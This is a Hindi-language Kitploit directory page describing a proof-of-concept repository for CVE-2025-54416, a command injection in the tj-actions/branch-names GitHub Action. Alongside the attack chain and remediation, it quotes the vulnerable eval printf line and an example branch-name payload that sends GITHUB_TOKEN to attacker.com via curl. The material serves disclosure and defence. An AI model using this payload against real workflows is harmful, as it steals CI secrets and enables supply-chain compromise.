Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
atlas-tj-actions-poc — CVE-2025-54416 tj-actions/branch-names कमांड इंजेक्शन के लिए प्रमाण-अवधारणा | Kitploit
उपकरण/GitHubGitHub/hexbornestudio/atlas-tj-actions-poc
भेद्यता विश्लेषणशोषणडेटा निष्कासनकमांड एंड कंट्रोलआपूर्ति श्रृंखला सुरक्षालर्निंग और शिक्षा
GitHubhexbornestudio/atlas-tj-actions-poc

atlas-tj-actions-poc

CVE-2025-54416 tj-actions/branch-names कमांड इंजेक्शन के लिए प्रमाण-अवधारणा

रिपॉजिटरी देखें
35 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-54416: tj-actions/branch-names कमांड इंजेक्शन PoC

यह रिपॉजिटरी CVE-2025-54416 का प्रदर्शन करता है, जो tj-actions/branch-names में एक महत्वपूर्ण कमांड इंजेक्शन भेद्यता है, जो 5,000 से अधिक सार्वजनिक रिपॉजिटरी को प्रभावित करती है।

भेद्यता

tj-actions/branch-names GitHub Action (संस्करण <= 8.2.1) असुरक्षित eval printf "%s" का उपयोग करता है जो उचित सफाई के बाद कमांड इंजेक्शन जोखिमों को पुनः प्रस्तुत करता है।

root@kitploit:~
# tj-actions/branch-names में असुरक्षित कोड पैटर्न:
echo "base_ref_branch=$(eval printf "%s" "$BASE_REF")" >> "$GITHUB_OUTPUT"

हमला श्रृंखला

  1. हमलावर शेल कमांड वाले दुर्भावनापूर्ण नाम के साथ एक शाखा बनाता है
  2. पीड़ित का वर्कफ़्लो शाखा का नाम निकालने के लिए tj-actions/[email protected] का उपयोग करता है
  • निकाला गया शाखा नाम (हमलावर पेलोड के साथ) बाद के शेल कमांड में उपयोग किया जाता है
  • CI रनर संदर्भ में कमांड रनर के विशेषाधिकारों के साथ निष्पादित होता है
  • गोपनीय जानकारी (AWS कुंजियाँ, GITHUB_TOKEN, आदि) बाहर निकाली जाती है
  • उदाहरण पेलोड

    शाखा का नाम: main$(curl https://attacker.com/exfil?secret=$GITHUB_TOKEN)

    जब वर्कफ़्लो चलता है:

    root@kitploit:~
    echo "IMAGE_TAG=${{ steps.branch-name.outputs.current_branch }}"
    # वास्तविक आउटपुट: IMAGE_TAG=main$(curl https://attacker.com/exfil?secret=$GITHUB_TOKEN)
    # $(...) का मूल्यांकन शेल द्वारा किया जाता है, GITHUB_TOKEN को बाहर निकालता है
    

    प्रभाव

    • संवेदनशील रहस्यों की चोरी (AWS कुंजियाँ, API टोकन, GITHUB_TOKEN)
    • अनधिकृत कोड संशोधन
    • उत्पादन रजिस्ट्रियों में दुर्भावनापूर्ण इमेज पुश
    • समझौता किए गए CI/CD के माध्यम से आपूर्ति श्रृंखला हमले

    सुधार

    tj-actions/branch-names@v9 या बाद के संस्करण पर अपडेट करें, जो eval printf "%s" को सुरक्षित printf कॉल से बदल देता है।

    संदर्भ

    • GitHub सलाहकार GHSA-gq52-6phf-x2r6
    • CVE-2025-54416
    टूल डाउनलोड करें